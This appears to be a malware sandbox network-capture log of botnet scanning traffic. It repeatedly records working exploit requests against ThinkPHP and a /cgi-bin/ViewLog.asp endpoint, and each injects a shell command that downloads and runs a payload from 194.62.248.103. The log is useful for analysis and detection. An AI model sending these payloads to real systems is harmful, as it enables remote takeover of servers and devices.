                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        882192.168.2.2335536112.173.143.6180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.265795946 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:13.777707100 CEST588INData Raw: 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 76 61 72 73 5b 31 5d 5b 5d 3d
                                                        Data Ascii: hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget 404 Not FoundContent-Type: text/htmlContent-Length: 341Date: Mon, 15 Apr 2024 02:06:18 GMTServer: ulwsd/1.0.1-20140331X-Frame-Options: SAMEORIGIN


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        883192.168.2.234310831.136.237.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.337719917 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.442814112 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.585968018 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:33.620230913 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.212879896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        884192.168.2.234999862.29.123.528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.362162113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.466799974 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.609872103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:34.640104055 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.213016033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        885192.168.2.234960094.122.10.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.362199068 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.466909885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.609924078 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:34.640137911 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.213044882 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        886192.168.2.235146431.200.53.1748080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.362232924 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.466754913 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.609935999 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:34.640120029 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.212878942 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        887192.168.2.235477694.120.219.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.363226891 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.466777086 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.610013008 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:34.640125990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:59.212893963 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        888192.168.2.2341918112.133.234.12780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.664658070 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:13.112624884 CEST315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Sun, 14 Apr 2024 14:43:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        889192.168.2.2335950112.164.61.9980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:12.818020105 CEST236INHTTP/1.0 400 Bad Request
                                                        Content-type: text/html
                                                        Date: Sun, 14 Apr 2024 14:37:13 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        890192.168.2.2352814112.240.60.13580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:13.451338053 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:13.824737072 CEST1289INData Raw: 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09
                                                        Data Ascii: s/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 661bea19_PS-000-014A8242_14674-30643<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" cla
                                                        Apr 14, 2024 16:37:13.824757099 CEST1289INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 2836
                                                        Connection: close
